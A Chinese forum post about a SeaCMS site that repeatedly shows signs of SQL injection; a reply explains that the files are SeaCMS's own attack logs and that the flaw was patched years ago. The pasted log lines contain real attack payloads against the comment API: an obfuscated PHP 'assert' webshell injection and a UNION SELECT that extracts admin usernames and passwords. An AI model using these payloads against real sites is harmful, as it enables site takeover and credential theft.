发现海洋CMS程序老是被挂马
海洋CMS程序老是被sQL注入全在data文件夹下生成PHP文件 注入的代码如下113.128.35.216||/comment/api/index.php?gid=1&page=2&rlist[]=*hex/$d=chr(65).chr(83).chr(115).chr(101).chr(114).chr(116);@$d($_POST);?%3E||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=1 AND id in (*hex/$d=chr(65).chr(83).chr(115).chr(101).chr(114).chr(116);@$d($_POST);?>) AND ischeck=1 ORDER BY id DESC limit 10||unusual character
107.148.224.118||//comment/api/index.php?gid=22&page=9&type=3&rlist[]=1)//**@%60'%60**@//UNION%20SELECT%23%0aname,password,null,null,null,null,null,null,null,null,null%23%0afrom%23%0asea_admin--%20@%60'%60||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=3 AND id in (1)//**@`\'`**@//UNION SELECT#
name,password,null,null,null,null,null,null,null,null,null#
from#
sea_admin-- @`\'`) AND ischeck=1 ORDER BY id DESC limit 10||comment detect
198.144.159.130||//comment/api/index.php?gid=22&page=9&type=3&rlist[]=1)//**@%60'%60**@//UNION%20SELECT%23%0aname,password,null,null,null,null,null,null,null,null,null%23%0afrom%23%0asea_admin--%20@%60'%60||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=3 AND id in (1)//**@`\'`**@//UNION SELECT#
name,password,null,null,null,null,null,null,null,null,null#
from#
sea_admin-- @`\'`) AND ischeck=1 ORDER BY id DESC limit 10||comment detect
198.144.159.130||/comment/api/index.php?gid=22&page=9&type=3&rlist[]=1)//**@%60'%60**@//UNION%20SELECT%23%0aname,password,null,null,null,null,null,null,null,null,null%23%0afrom%23%0asea_admin--%20@%60'%60||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=3 AND id in (1)//**@`\'`**@//UNION SELECT#
name,password,null,null,null,null,null,null,null,null,null#
from#
sea_admin-- @`\'`) AND ischeck=1 ORDER BY id DESC limit 10||comment detect
解决方法:
如果开启了攻击记录,海洋cms会在data目录下记录被攻击的日志。
方便站长查看攻击详情。
这个文件只是记录了攻击信息,并不代表你的系统被成功注入了。
生成的文件是在data目录下,类似:
0ab9b294a60790b38ad33aa133db25d1_safe.txt
文件格式应该是txt文本文件
而且针对
/comment/api/index.php?gid=1&page=...................
这种形式的注入攻击,都是几年之前的漏洞了。
海洋cms几年前就修复了该问题,系统会直接拦截类似攻击。
页:
[1]